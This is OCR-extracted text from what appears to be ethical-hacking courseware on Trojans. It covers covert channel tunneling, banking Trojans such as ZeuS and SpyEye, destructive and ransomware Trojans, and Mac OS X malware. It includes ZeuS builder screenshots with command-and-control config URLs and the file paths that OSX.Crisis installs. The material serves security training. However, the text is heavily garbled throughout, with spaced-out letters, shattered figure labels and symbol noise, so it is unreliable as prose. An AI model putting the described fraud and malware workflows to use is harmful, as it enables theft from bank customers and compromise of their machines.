m a n y p r o b a b l e w a y s t o a c h i e v e a n d a l l o w a r b i t r a r y d a t a t r a n s f e r c h a n n e l s in t h e d a t a s t r e a m s
(TCP, U D P , H TT P ) a u t h o r i z e d b y a n e t w o r k a c c e s s c o n t r o l s y s t e m . A C o v e r t C h a n n e l T u n n e l i n g
T o o l (CCTT) T r o j a n p r e s e n t s v a r i o u s e x p l o i t a t i o n t e c h n i q u e s , c r e a t i n g a r b i t r a r y d a t a t r a n s f e r
c h a n n e ls
in t h e
d a ta
s tre a m s
a u th o riz e d
by a n e tw o rk
access c o n tr o l
s y s te m .
It e n a b l e s
a t t a c k e r s t o g e t a n e x t e r n a l s e r v e r s h e ll f r o m w i t h i n t h e i n t e r n a l n e t w o r k a n d v i c e v e r s a . It s e ts
a T C P / U D P / H T T P C O N N E C T | P O S T c h a n n e l a l l o w i n g TCP d a t a s t r e a m s (SSH, S M T P , POP, e t c . . . )
b e tw e e n an e x te rn a l s e rv e r a n d a b o x fr o m w ith in th e in te rn a l n e tw o rk .
Client
T a rg e t
S e rvices
FIGURE 6.31: Covert Channel Trojan
M o d u le 0 6 P ag e 9 0 7
E -b a n k in g T ro j ans
E ‫־‬b a n k i n g
CEH
imttiM
tUx*l NmIm
T r o ja n s
E -b a n k in g T ro ja n s a re v e r y d a n g e r o u s a n d h a v e b e c o m e a m a jo r t h r e a t t o th e b a n k in g
t r a n s a c t i o n s p e r f o r m e d o n l i n e . T h is T r o j a n is i n s t a l l e d o n t h e v i c t i m ' s c o m p u t e r w h e n h e o r s h e
c lic k s t h e e m a i l a t t a c h m e n t o r c lic k s o n s o m e a d v e r t i s e m e n t o n c e t h e t a r g e t l o g i n s in t o t h e
b a n k i n g s ite . T h e T r o j a n is p r e p r o g r a m m e d w i t h a m i n i m u m
ra n g e a nd m a x im u m
ra n g e to
s t e a l . So i t d o e s n ' t w i t h d r a w all t h e m o n e y f r o m t h e b a n k . T h e n t h e T r o j a n c r e a t e s s c r e e n s h o t s
o f th e b a n k a c c o u n t s ta te m e n t; th e v ic tim s a re n 't a w a re o f th is ty p e o f fra u d and th in k s th a t
t h e r e is n o v a r i a t i o n in t h e i r b a n k b a l a n c e u n l e s s t h e y c h e c k t h e b a l a n c e f r o m o t h e r s y s t e m s o r
f r o m A T M m a c h in e s . O n ly w h e n th e y c h e c k th e b a la n c e w ill th e d iffe r e n c e s be n o tic e d .
T h e f o l l o w i n g d i a g r a m e x p l a i n s h o w t h e a t t a c k is c a r r i e d o u t u s i n g E - b a n k i n g T r o j a n s .
M o d u le 0 6 P ag e 9 0 8
M a licio u s a d ve rtise m e nts pub lish e d
am o ng th e le g itim a te w e bsite s
User access to infecte d
Uploads m aliciou s
w e b site
M a lw a re S e rv e r
adve rtise m e nts
L e g itim a te
'
The w e b site is re d ire cte d to
‘ W
•
th e m a N cio u sexp lo it k it
W e b s ite s
—•
4
W
User re d ire cts to m a liciou s
^
T rojan re p o rts fo r a n ew b o t
e x p lo it kit
Sends in s tru c tio n to th e Troj,
s.
^0
The User's PC e xp
x p lo ite d
^
T rojan re p o rts user a ctivities
’*
Attacker
r
9# !
■‫ •־‬a r
w
In s tru c tio n to m a n ip u la te
C o n tro l a n d
banks tra n sa ctio ns
$
‫י‬
t i i I
User access bank A/C
C o m m a n d S e rv e r
A
■>2#
M a n ip u la te s user's bank
tra n sa ctio n
Reports a b o u t successfu l/fa ile d
tra n sa ctio n
Financial In s titu tio n
FIGURE 6.32: illustrating the attack using E-banking Trojans
H e re th e a tta c k e r firs t in fe c ts th e m a lic io u s a d v e r tis e m e n ts a n d p u b lis h e s th e s e a d v e r tis e m e n ts
am ong
g e n u in e
w e b s ite s . W h e n
th e
v ic tim s
re d ire c ts h im o r h e r to a w e b s ite fr o m
access th e
in fe c te d
w e b s ite ,
w h e r e th e e x p lo it k it g e ts lo a d e d
it a u to m a tic a lly
o n to th e v ic tim 's
s y s t e m . T h u s , t h e e x p l o i t k i t a l l o w s t h e a t t a c k e r t o c o n t r o l w h a t is l o a d e d in t h e v i c t i m ' s s y s t e m
and
used f o r in s ta llin g a T ro ja n
h o r s e . T h is m a l w a r e
is h i g h l y o b f u s c a t e d
a n d can o n ly be
d e t e c t e d b y f e w a n t i - v i r u s s y s t e m s . T h e s y s t e m o f t h e v i c t i m is n o w a b o t n e t f r o m w h e r e t h e
T r o j a n e a s i ly s e n d s a n d r e c e i v e s i n s t r u c t i o n f r o m t h e c o n t r o l a n d c o m m a n d s e r v e r w i t h o u t t h e
k n o w le d g e o f th e v ic tim . W h e n a v ic tim
a c c e s s his o r h e r b a n k a c c o u n t f r o m
th e in fe c te d
s y s t e m , all t h e s e n s i t i v e i n f o r m a t i o n , i.e ., u s e d b y t h e v i c t i m in a c c e s s i n g a c c o u n t i n f o r m a t i o n
s u c h as l o g in c r e d e n t i a l s ( u s e r n a m e p a s s w o r d ) , p h o n e n u m b e r , s e c u r i t y n u m b e r , d a t e o f b i r t h ,
e t c . a r e s e n t t o t h e C o n t r o l a n d C o m m a n d S e r v e r b y t h e T r o j a n . If t h e v i c t i m is a c c e s s i n g t h e
tr a n s a c tio n s e c tio n o f th e b a n k in g w e b s ite f o r p e r f o r m in g o n lin e tr a n s a c tio n s , th e n th e d a ta
t h a t is e n t e r e d
by th e v ic tim
on th e tra n s a c tio n fo r m
is s e n t t o t h e C o n t r o l a n d C o m m a n d
S e rv e r in s te a d o f t o t h e b a n k w e b s it e . T h e c o n t r o l a n d c o m m a n d s e r v e r s y s te m a n a ly z e s a n d
decodes
th e
in fo rm a tio n
and
id e n tifie s
s u ita b le
money
m u le
bank
a c c o u n ts . T h e
T ro ja n
re c e iv e s in s tru c tio n s f r o m th e c o n tr o l a n d c o m m a n d s e rv e r t o se n d t h e la te s t tr a n s a c tio n f o r m
t h a t is u p d a t e d b y t h e c o n t r o l a n d c o m m a n d s e r v e r
to th e b a n k f o r tr a n s fe rr in g m o n e y to th e
m u le a c c o u n t. C o n fir m a t io n f r o m th e b a n k a b o u t s u c c e s s fu l/fa ile d tr a n s a c tio n o f th e m o n e y
t h a t w a s t r a n s f e r r e d is a ls o r e p o r t e d b y t h e T r o j a n t o t h e c o n t r o l a n d c o m m a n d s e r v e r .
M o d u le 0 6 P ag e 9 09
B a n kin g T ro ja n A n alysis
CEH
I
e
(•rtifwtf
Trojan in te rc e p ts v a lid
e n te re d by a user
0
ItkNjI Nm Iw•
It re pla ce s th e TAN w ith a ra n d o m n u m b e r th a t w ill be re je c te d by
th e bank
I
Q A tta c k e r can m isuse th e in te rc e p te d TAN w ith th e u s e r 's login d e ta ils
Trojan c re a te s fa k e fo rm fie ld s o n e-b a n k in g p a g es
A d ditional fields elicit e x tra in fo rm a tio n su c h as c ard n u m b e r a n d
d a te o f birth
A tta c k er c a n u se th is in fo rm a tio n to im p e rs o n a te a n d c o m p ro m is e
v ic tim 's a c c o u n t
a
Trojan analyses POST re q u e s ts a n d re spo n se s to v ic tim 's b ro w s e r
a
It c o m p ro m is e s th e s c ra m b le p ad a u th e n tic a tio n
a
Trojan in te rc e p ts s c ra m b le p ad in p u t as u ser e n te rs C u s to m e r N u m b e r
and Personal Access Code
Copyright © by
B a n k in g
T r o ja n
A n a ly s is
A b a n k e r T r o j a n is a m a l i c i o u s p r o g r a m t h a t a l l o w s o b t a i n i n g p e r s o n a l i n f o r m a t i o n
a b o u t u sers a n d c lie n ts u s in g o n lin e b a n k in g a n d p a y m e n t s y s te m s .
A b a n k i n g T r o j a n a n a l y s is i n v o l v e s t h e f o l l o w i n g t h r e e b a s ic t y p e s :
T a n G a b b l e r : A T r a n s a c t i o n A u t h e n t i c a t i o n N u m b e r ( T A N ) is u s e d f o r a u t h e n t i c a t i n g t h e o n l i n e
b a n k i n g t r a n s a c t i o n , w h i c h is a s i n g l e - u s e p a s s w o r d . T h e b a n k i n g T r o j a n e x p l i c i t l y a t t a c k s t h e
t a r g e t ' s o n l i n e b a n k i n g s e r v i c e s t h a t d e p e n d o n t h e T A N . W h e n t h e T A N is e n t e r e d , t h e T r o j a n
g rabs th a t n u m b e r and changes th a t n u m b e r w ith a n y ra n d o m
n u m b e r t h a t is i n c o r r e c t a n d
r e j e c t e d b y t h e b a n k . T h e c o n t e n t is f i l t e r e d b y t h e T r o j a n a n d t h e i n c o r r e c t n u m b e r is r e p l a c e d
in o r d e r t o s a t i s f y t h e t a r g e t . A n a t t a c k e r c a n m i s u s e t h e i n t e r c e p t e d T A N w i t h t h e t a r g e t ' s l o g in
d e ta ils .
H T M L I n j e c t i o n : T h is t y p e o f T r o j a n c r e a t e s d u p l i c a t e f i e l d s o n t h e o n l i n e b a n k i n g s i t e s a n d
th e s e e x tra fie ld s a re used b y th e a tta c k e r t o c o lle c t th e ta r g e ts a c c o u n t d e ta ils , c r e d it ca rd
n u m b e r , d a te o f b irth , e tc . A tta c k e r s can use th is in fo r m a t io n t o im p e r s o n a te a n d c o m p r o m is e
th e ta rg e t's a c c o u n t.
F o r m G r a b b e r : T h is is a n a d v a n c e d m e t h o d o f c o l l e c t i n g d a t a f r o m t h e I n t e r n e t a v a i l a b l e o n t h e
v a r i o u s b r o w s e r s . T h is is h i g h l y e f f e c t i v e in c o l l e c t i n g t h e t a r g e t IDs, p a s s w o r d s , a n d o t h e r
se n s itiv e in fo r m a tio n .
M o d u le 0 6 P ag e 9 1 0
E‫־‬banking Trojan: ZeuS and SpyEye CEH
J
T h e m a in o b je c tiv e o f Z euS a n d S p yE ye T ro ja n s is t o s te a l b a n k a n d c r e d it c a rd a c c o u n t
i n f o r m a t io n , f t p d a ta , a n d o t h e r s e n s itiv e in f o r m a t io n f r o m in fe c te d c o m p u te r s v ia
w e b b ro w s e r s a n d p r o t e c te d s to ra g e
J
S p yE ye ca n a u t o m a t ic a lly a n d q u ic k ly in i t i a t e a n o n lin e t r a n s a c tio n
ZeuS Control Panel
Builder
Config and loader kuidng
Sou‫־‬c9corfig file:
S p y E y e
' : iHnri !rents and cfi^ng<\krhayacH\>«h‫<־‬p\T>n/.arr1_7ft ‫ףין‬:
|
Edit conFg
] [
Bjild corfij
]
o
M
^ J fln O W O
j l Statistic
Settings
J
<i**t *MtiSti<
Output
Loodnj conFlg from filo 1C:\D00jrnorts and
>5mnaslK0bayash\DesWop\iroyanoûÛej>\iocel\cco?1aJxe
Loodng succoododl
craacino loader fie XiUxiiurrentsaric
SoUlng5\Koboya5h\DosW:op\rrovano ZouSVdr.oxo1.
botneHMAIN]
fcrr»r_ccnfig-3SOCOOO, 60000
tmsrJ 0as-*>ui)ui). touuu
tftwr_?tats60000 ,200000 ‫נ ־‬
( ’pJNMtvJ at hrp, /*vox miorrtoft-Anvlowi
irl conl‫־‬a ‫=׳‬hO:D://203.H2.10.2/‫׳<׳‬/o u ‫׳‬tr«vfv»ed.iclabr1
u‫׳‬l_compip-h‫׳‬:tp ://Wiabsmyip. car/
tsjld succeeded!
CK
Copyright © by
E ‫־‬b a n k i n g
T r o ja n :
Z e u S
a n d
‫ן‬
EG-G*ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.
S p y E y e
Z euS
S ource: h tt p :/ /w w w .s e c u r e w o r k s . c o m
Z e u S is a l a t e s t t h r e a t f o r o n l i n e b a n k i n g t r a n s a c t i o n s as i t u s e s b o t h f o r m g r a b b e r as w e l l as
k e y s t r o k e l o g g i n g . It is m a i n l y s p r e a d t h r o u g h d r i v e - b y d o w n l o a d s a n d p h i s h i n g s c h e m e s . T h e
Z e u S b o t n e t t a r g e t s o n l y W i n d o w s . N e w v e r s i o n o f Z e u S e v e n a f f e c t s W i n d o w s V is t a . It h a s
e v o lv e d o v e r t im e a n d in c lu d e s a fu ll a rs e n a l o f in fo r m a t io n s te a lin g c a p a b ilitie s :
0
S te a ls d a t a s u b m i t t e d in HTTP f o r m s
0
S te a ls a c c o u n t c r e d e n t i a l s s t o r e d in t h e W i n d o w s P r o t e c t e d S t o r a g e
0
S te a ls c l i e n t - s i d e X . 5 0 9 p u b l i c k e y i n f r a s t r u c t u r e (P KI) c e r t i f i c a t e s
0
S te a ls FTP a n d POP a c c o u n t c r e d e n t i a l s
0
S t e a l s / d e l e t e s HTTP a n d F la s h c o o k i e s
0
M o d ifie s th e H T M L pages o f t a r g e t w e b s ite s fo r in fo r m a tio n s te a lin g p u rp o s e s
0
R e d ire c ts ta r g e ts f r o m t a r g e t w e b pages t o a t t a c k e r c o n t r o ll e d o n e s
0
T a k e s s c r e e n s h o t s a n d s c r a p e s H T M L f r o m t a r g e t s ite s
M o d u le 0 6 P ag e 9 11
9
S e a rch e s f o r a n d u p lo a d s file s f r o m t h e in fe c te d c o m p u t e r
9
M o d if ie s t h e lo cal h o s ts file (% s y s te m r o o t % \ s y s t e m 3 2 \ d r iv e r s \ e t c \ h o s t s )
tJ
D o w n lo a d s and e xe c u te s a rb itr a ry p ro g ra m s
Q
D e le te s c ru c ia l re g is tr y keys, r e n d e r in g t h e c o m p u t e r u n a b le t o b o o t in t o W i n d o w s
&» ZeuS C o n tro l P anel
Builder
IBuilder
Logs decoder
Config and loader building
Source config file:
C:\Documents and Settings\Kobayash 1\Desktop\Troyano_ZeuSV
Edit config
| |
Build config
| |
[ Browse...
|
Build loader
Output
Loading config from fie 'C :\Documents and
Setthgs\Kobayashi\Desktop\Troyano_ZetjS\ZeuS\local\config.txt'...
Loading succeeded1
Creating loader file 'C:\Documents and
Settngs\Kobayashi\Desktop\Troyano ZeuS\ldr.exe'...
botnet-[MAIN]
timer_conf!g-3600000, 60000
timer Jogs-6 00 0 0, 60000
tim er_stats-1200000, 60000
url_config-http://203.142.10.2/~yo<jrtrav/web/cfg.bin
url_comp!p=http://what 1smyp.com/
Buld succeeded!
*
FIGURE 6.33: ZeuS Screenshot
r
S p y E y e
S p y E y e is m a l i c i o u s s o f t w a r e t h a t is u s e d b y t h e a t t a c k e r t o s t e a l t a r g e t s ' m o n e y f r o m
o n l i n e b a n k a c c o u n t s . A c t u a l l y , t h i s is a b o t n e t w i t h a n e t w o r k o f c o m m a n d - a n d - c o n t r o l
s e r v e r s . T h is a u t o m a t i c a l l y t r i g g e r s w h e n t h e t a r g e t s t a r t s h is o r h e r t r a n s a c t i o n a n d c a n e v e n
b lo c k th e b a n k 's tr a n s a c tio n s .
Spy Eye
O **2009
‫!נ‬33120
^
1 2 /7 9
1
Find INFO
Statistic
Settings
221:
1LI‫•נ« ו‬
Get s ta tis tic
Get hosts
D«V fo r
:
*‫ יי׳ם״‬t
CTp»Hk*m m* h ttp //w ww.m!crosoft‫־‬w<ndows-s<cufTty com co_
©
to b a n t h « h o tf ( wwMr.9009k .c 0 m ) ?
Do you really
OK
w.d«lm(H«*nung ■com
[
O tm o m
]
•X
•X
•X
•X
•X
•X
•X
431
»x
427
•X
•X
342
FIGURE 6.34: SpyEyeScreenshot
M o d u le 0 6 P ag e 9 12
Destructive Trojans: M 4 sT3 r
Trojan
CEH
d e s t r u c tiv e t y p e o f T ro ja n
This Trojan form ats all local and
n e tw o rk drives
W hen executed, this Trojan
destroys the op era ting system
The user w ill not be able to bo ot
the Operating System
M 4 s T 3 r is a d a n g e r o u s a n d
F o rm a t USB D riv e ,
n e tw o r k D r iv e .....
F o rm a t C :\ E :\ F : \ .....
Copyright © by
r
D e s tr u c tiv e
T r o ja n s :
M
EG-G(Uncil. All Rights Reserved. Reproduction Is Strictly Prohibited
4 s T 3 r T r o ja n
T h e M 4 s T 3 r T r o j a n is e x c l u s i v e l y d e s i g n e d t o d e s t r o y o r d e l e t e f i l e s f r o m t h e v i c t i m ' s
c o m p u te r.
F iles a r e a u t o m a t i c a l l y d e l e t e d
b y th e T ro ja n s , w h ic h
can
be c o n tro lle d
by th e
a t t a c k e r o r c a n b e p r e p r o g r a m m e d lik e a l o g i c b o m b t o p e r f o r m a p a r t i c u l a r t a s k o n a g i v e n
tim e a n d d a te .
W hen
e x e c u te d ,
th is
T ro ja n
d e s tro y s
th e
o p e ra tin g
s y s te m .
The
v ic tim
cannot
boot
th e
o p e r a t i n g s y s t e m . T h is T r o j a n f o r m a t s a ll l o c a l a n d n e t w o r k d r i v e s .
F o r m a t USB D riv e ,
n e t w o r k D r i v e ......
F o r m a t C :\ E :\ F : \ ......
M 4 s T 3 r T ro ja n
FIGURE 6.35: Attacker using M4sT3r Trojan fo r deleting or destroying files
M o d u le 0 6 P ag e 9 13
N o tific a tio r T ro j ans
■
N o tific a tio n T rojan sends th e lo ca tio n o f th e v ic tim 's IP address to th e a tta cke r
B
W h e n e ve r th e v ic tim 's c o m p u te r connects to th e In te rn e t, th e a tta cke r receives
th e n o tific a tio n
N o tific a tio n Types
■>
SIN N o tif ic a t io n
D irectly notifies th e attacker's server
■>
ICQ N o t if ic a t io n
N otifies th e a ttacker using ICQ channels
»
PHP N o tif ic a t io n
■>
E -M a il N o t if ic a t io n
th e attacker's server
Sends th e n o tific a tio n thro ugh em ail
N o tific a tio n is sent thro ugh n e t send com m and
V ictim
}■
>
N e t S end
Infected w ith
Trojan
j.
.»
CGI N o t if ic a t io n
•>
Sends th e data by connecting to PHP server on
IRC n o t if ic a t io n
Sends th e data by connecting to PHP server on
th e attacker's server
N otifies th e a ttacke r using IRC channels
Copyright © by EG-GOIIIICil. All RightsfgSen/ed;Reproduction is Strictly Prohibited.
N o tif ic a tio n
T r o ja n s
N o tific a tio n T ro ja n s se n d th e
IP a d d r e s s o f t h e v i c t i m ' s c o m p u t e r t o t h e a t t a c k e r .
W h e n e v e r th e v ic tim o p e ra te s th e s y s te m , th e n o tific a tio n T ro ja n n o tifie s th e a tta c k e r. S o m e o f
t h e n o t if ic a t io n s in c lu d e :
©
SIN N o t i f i c a t i o n : D i r e c t l y n o t i f i e s t h e a t t a c k e r ' s s e r v e r
0
IC Q N o t i f i c a t i o n : N o t i f i e s t h e a t t a c k e r u s i n g IC Q c h a n n e l s
0
PHP N o t i f i c a t i o n : S e n d s t h e d a t a b y c o n n e c t i n g t o PHP s e r v e r o n t h e
0
E m a il N o t i f i c a t i o n : S e n d s t h e n o t i f i c a t i o n t h r o u g h e m a i l
0
N e t S e n d : N o t i f i c a t i o n is s e n t t h r o u g h n e t s e n d c o m m a n d
©
CGI N o t i f i c a t i o n : S e n d s t h e d a t a b y c o n n e c t i n g t o PHP s e r v e r o n t h e a t t a c k e r ' s s e r v e r
©
IRC n o t i f i c a t i o n : N o t i f i e s t h e a t t a c k e r u s i n g IRC c h a n n e l s
M o d u le 0 6 P ag e 9 1 4
a tta c k e r's s e rv e r
C re d it C ard T ro j ans
CEH
UrtifW itkMl lUckw
C re dit card Trojans steal v ic tim s ' c re d it card
re la te d da ta such as card no., CVV2, and b illin g
de tails
A tta c k er
A
:
w
C re dit card Trojans tric k users to visit fa ke eb a n k in g w e b s ite s and e n te r personal
in fo rm a tio n
‫<יי‬
T rojan servers tra n s m it th e s to le n da ta to
re m o te hackers using em a il, FTP, IRC, o r o th e r
V ictim
A
m e th o d s
V IS A
Copyright © by
C r e d it C a r d
EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited
T r o ja n s
C re d it c a rd T ro ja n s , o n c e th e y a re in s ta lle d o n th e v ic tim 's s y s te m , c o lle c t v a rio u s
d e t a i l s s u c h as c r e d i t c a r d
re g is tra tio n fo rm
is c r e a t e d
n u m b e r s , la te s t b illin g d e ta ils , e tc . T h e n , a fa k e o n lin e b a n k in g
and th e y m a k e th e c re d it card
u s e r b e l i e v e t h a t i t is g e n u i n e
in fo r m a tio n f r o m th e ba n k. O n ce th e u se r e n te rs th e re q u ire d in fo r m a tio n , a tta c k e rs c o lle c t th e
in fo r m a tio n a nd use th e c re d it card fo r p e rs o n a l use w it h o u t th e k n o w le d g e o f th e v ic tim .
C r e d i t c a r d T r o j a n s s t e a l v i c t i m s ' c r e d i t - c a r d - r e l a t e d d a t a s u c h as c a r d n u m b e r , C V V 2 s , a n d
b illin g d e ta ils . T h e s e T ro ja n s t r ic k u sers in to v is it fa k e e - b a n k in g w e b s ite s a n d e n te r in g p e rs o n a l
i n f o r m a t i o n . T h e T r o j a n s e r v e r s t r a n s m i t t h e s t o l e n d a t a t o r e m o t e h a c k e r s u s i n g e m a i l , FTP,
IRC, o r o t h e r m e t h o d s .
M o d u le 0 6 P ag e 9 1 5
FIGURE 6.36: Attacker stealing credit card inform ation of victim 's using credit card Trojan
M o d u le 0 6 P ag e 9 1 6
Data Hiding Trojans (Encrypted
Trojans)
Attackers demand a ransom
or force victim s to make
purchases from the ir
online drug stores in return
fo r the password to unlock
files
Encryption Trojan encrypts
data files in victim 's system
and renders in fo rm a tio n
unusable
"Your computer caught our
software while browsing
illegal porn pages, all your
documents, text files,
databases in the
fold er
/
Company
M y Documents
Database
was encrypted with
complex password."
C♦♦ source code
Personal
Information
(S
- - ‫־‬
Important
Files
& Folders
F
Financial
Information
w
'Do not try to search
fo r a program that
k encrypted your
™ >information - it
' simply does not
Confidential
Documents
exists in your
hard disk anymore,"
pay us the money to
unlock the password
Copyright © by EC-ClllCil. All Rights Jte$ervfei;Reproduction is Strictly Prohibited.
D a ta
H id in g
T r o ja n s
( E n c r y p te d
T r o ja n s )
E n c ry p tio n T ro ja n s e n c ry p t th e d a ta p re s e n t o n th e v ic tim 's c o m p u t e r a n d re n d e rs th e
c o m p le te
d a ta
u n u s a b le : " Y o u r c o m p u t e r c a u g h t o u r s o ft w a r e
w h ile
b ro w s in g
i ll e g a l
p o rn
p a g e s , all y o u r d o c u m e n t s , t e x t fil e s , d a t a b a s e s in t h e f o l d e r M y D o c u m e n t s w a s e n c r y p t e d w i t h
c o m p le x p a s s w o rd ." A tta c k e rs d e m a n d a ra n s o m o r fo rc e v ic tim s to m a k e p u rch a se s fr o m th e ir
o n l i n e d r u g s t o r e s in r e t u r n f o r t h e p a s s w o r d t o u n l o c k f i l e s : " D o n o t t r y t o s e a r c h f o r a p r o g r a m
t h a t e n c r y p t e d y o u r i n f o r m a t i o n - i t s i m p l y d o e s n o t e x i s t s in y o u r h a r d d i s k a n y m o r e , " p a y us
t h e m o n e y t o u n l o c k t h e p a s s w o r d . " T h is c a n b e d e c r y p t e d o n l y b y t h e a t t a c k e r , w h o d e m a n d s
m o n e y , o r th e y can fo rc e th e u s e r b u y f r o m a fe w w e b s ite s fo r d e c ry p tio n .
M o d u le 0 6 P ag e 9 1 7
OS X T ro ja n : C ris is
B
CEH
OSX.Crisis is a Trojan horse tha t steals potentially confidential info rm atio n and opens a back d o or
on the com prom ised com puter
W h e n t h e T ro ja n is e x e c u te d , it c re a te s t h e fo llo w in g d ire c to rie s a n d file s :
/S y s te m /L ib ra ry /F ra m e w o rk s /F o u n d a tio n .fra m e w o rk /X P C S e rv ic e s /c o m .a p p le .m d w o r k e r _ s e rv e r.x p c /C o n te n ts /M a c O S /c o m .a p p le .m d w
o rk e r_ s e rv e r
/S y s te m /L ib ra ry /F ra m e w o rk s /F o u n d a tio n .fra m e w o rk /X P C S e rv ic e s /c o m .a p p le .m d w o r k e r _ s e rv e r.x p c /C o n te n ts /R e s o u r c e s /
$ H O M E /L ib ra ry /L a u n c h A g e n ts /c o m .a p p le .m d w o rk e r.p lis t
$ H 0 M E /L ib ra ry /P r e fe re n c e s /jl3 V 7 w e .a p p
$ H O M E /L ib ra ry /S c rip tin g A d d itio n s /a p p le H ID /C o n te n ts /ln fo .p lis t
$ H O M E /lib ra ry /S c rip tin g A d d itio n s /a p p le H ID /C o n te n ts /M a c O S /IU n s A 3 C i.B z 7
S H O M E /L ib ra ry /S c rip tin g A d d itio n s /a p p le H ID /C o n te n ts /R e s o u rc e s /a p p le O s a x .r
Crisis m a y p e rfo rm th e fo llo w in g a ctio n s:
----------------------V
Monitor Skype Audio traffic
1
Record conversations in MS
Messenger and Adium
_Ji
M o n ito r Safari o r Firefox to re c o rd
w e b s ite s a n d c a p tu re s c r e e n s h o ts
Copyright © by
■
mi
O S
X
T r o ja n :
‫ר״‬
Send files to the command
and control server
C r is is
O S X .C ris is is a T r o j a n h o r s e t h a t s t e a l s p o t e n t i a l l y s e n s i t i v e i n f o r m a t i o n t h a t is o n t h e
v ic tim 's s y s te m a n d o p e n s a b ack d o o r on th e c o m p r o m is e d c o m p u t e r (v ic tim 's s y s te m ) fo r
f u t u r e a tta c k s .
W h e n t h e T r o j a n is e x e c u t e d , i t c r e a t e s t h e f o l l o w i n g d i r e c t o r i e s a n d f i l e s :
/ S y s t e m / L ib r a r y / F r a m e w o r k s / F o u n d a t io n . fra m e w o rk /X P C S e rv ic e s /c o m .a p p le .m d w o rk e
r _ s e r v e r . x p c /C o n te n ts /M a c O S /c o m .a p p le .m d w o rk e r_ s e rv e r
/ S y s te m / L ib r a r y /F r a m e w o r k s / F o u n d a tio n . fr a m e w o rk /X P C S e rv ic e s /c o m .a p p le .m d w o rk e
r _ s e r v e r . x p c /C o n te n ts /R e s o u rc e s /
$ H O M E /L ib r a r y /L a u n c h A g e n ts /c o m .a p p le .m d w o r k e r .p lis t
$ H O M E /L ib ra ry /P re fe re n c e s /j1 3 V 7 w e . app
$ H O M E /L ib ra r y /S c rip tin g A d d itio n s /a p p le H ID /C o n te n ts /I n f o . p l i s t
$ H O M E / L i b r a r y / S c r i p t i n g A d d i t i o n s / a p p l e H I D / C o n t e n t s / M a c O S / l U n s A 3 C i . Bz7
$ H O M E /L ib ra r y /S c rip tin g A d d itio n s /a p p le H ID /C o n te n ts /R e s o u rc e s /a p p le O s a x . r
T h e f o l l o w i n g a r e t h e a c t i o n s p e r f o r m e d b y t h e O S X .C ris is :
9
M o n it o r S kype a u d io tr a ffic
Q
M o n i t o r S a fa r i o r F i r e f o x t o r e c o r d w e b s i t e s a n d c a p t u r e s c r e e n s h o t s
0
R e c o r d c o n v e r s a t i o n s in M S M e s s e n g e r a n d A d i u m
9
S end file s t o th e c o m m a n d a n d c o n tr o l s e rv e r
M o d u le 0 6 P ag e 9 1 8
MAC OS X Trojan: DNSChanger
c EH
(•rtifwtf
ItkKJl Nm Im
jan uses social engineering techniques to make users download the program and run malicious code
T h e m a lw a r e m o d ifie s t h e DNS s e ttin g s o f th e a c tiv e n e t w o r k . T h e u se rs a re fo r c e d to
d o w n l o a d c o d e c s o r o t h e r m o v i e d o w n l o a d s t h r o u g h Q u i c k T i m e , e t c . O n c e t h e d o w n l o a d is
f i n i s h e d , t h e n t h e T r o j a n is a t t a c k e d , r e s u l t i n g in s l o w a c c e s s t o t h e I n t e r n e t , u n n e c e s s a r y a d s
p o p p i n g u p o n t h e s c r e e n o f t h e c o m p u t e r , e t c . T h is T r o j a n u s e s s o c ia l e n g i n e e r i n g t e c h n i q u e s
t o m a k e u sers d o w n lo a d th e p r o g r a m a n d ru n m a lic io u s c o d e .
FIGURE 6.37: Attacker injecting MAC OS X Trojan in victim 's system through downloads and prom pt
M o d u le 0 6 P ag e 9 1 9
MAC OS XTrojan: DNSChanger
( C o n t ’d )
M A C
O S
X
Q
£H
UrtifM| IthKJi lUckM
T r o j a n : D N S C h a n g e r ( C o n t ’d )
A f t e r th e u s e r d o w n lo a d s th e fa ls e c o d e c , th e p ro c e s s o f tr ic k in g a n d r e t r ie v in g th e
u s e r ' s i n f o r m a t i o n c o n t i n u e s as f o l l o w s :
0
D N S s e t t i n g s : L o c a l m a c h i n e ' s D NS s e t t i n g s a r e c h a n g e d t o a t t a c k e r ' s IP a d d r e s s
0
P l a y i n g a v i d e o : A f t e r t h e f a k e c o d e c is i n s t a l l e d , a v i d e o is p l a y e d
s o as n o t t o ra is e
s u s p ic io n s
9
H T T P m e s s a g e : A n o t i f i c a t i o n is s e n t t o t h e a t t a c k e r a b o u t t h e v i c t i m ' s m a c h i n e u s i n g an
H TTP p o s t m e s s a g e
9
C o m p l e t e c o n t r o l : H a c k e r s t a k e c o m p l e t e c o n t r o l o f t h e v i c t i m ' s M A C OS X c o m p u t e r
M o d u le 0 6 P ag e 9 2 0
Mac OS X Trojan: Hell Raiser
CEH
(■WM
I
■
HMul Had■•
Hell Raiser allows an attacker to gain access to the v ictim system and send pictures, pop up chat messages, transfer files to
and from the victim s system, com pletely m onitor the victim s operations, etc.
Chat interface
U 6CT nAXQftO «
M l V1CTMX $ WNOOW
DC
DC
Victor's parameters
;m s
(_______ PSCONNtCT_______
* 1HI to■►•‫•*׳‬dlX h •finng <
1(1to• p«n«m n ‫ ׳ז‬0‫ י״‬0 <‫•!»»• ״‬
‫ג‬5. it—
....
--- •jt---
.
N ote : T h e com p lete coverag e o f M A C OS X hackin g is p re sen te d in a sep arate m od u le
Copyright 0 by IG Council. All Rights Reserved. Reproduction Is Strictly Prohibited
M
a c
O S
X
T r o ja n :
H e ll R a is e r
H e ll R a is e r is m a l w a r e t h a t g e t s o n t o t h e v i c t i m ' s s y s t e m w h e n c l i c k e d o n , t h e u s e r i t
is a n i n n o c e n t f i l e . O n c e a c c e s s h a s b e e n g a i n e d t o t h e v i c t i m ' s s y s t e m , t h e a t t a c k e r c a n s e n d
p ic tu re s , p o p -u p c h a t m essages, can t r a n s fe r file s t o a n d f r o m th e v ic tim 's c o m p u te r , a n d e ve n
c a n t u r n O N a n d t u r n OFF t h e s y s t e m f r o m a r e m o t e l o c a t i o n . F in a lly , v i c t i m o p e r a t i o n s c a n b e
c o m p le te ly m o n ito re d .
M o d u le 0 6 P ag e 9 2 1
Ethical H acking a n d C o u n te rm e a s u re s C opyright © by EC-C0UllCil
T r o j a n A n a ly s is : F la m e
CEH
F la m e , a lso k n o w n as F la m e r, sK yW lp e r, o r S kyw ip e r, is m o d u la r c o m p u te r m a lw a re d is c o v e re d
in 2 0 1 2 t h a t a tta c k s c o m p u te rs ru n n in g t h e M ic r o s o f t W in d o w s o p e r a tin g sy s te m
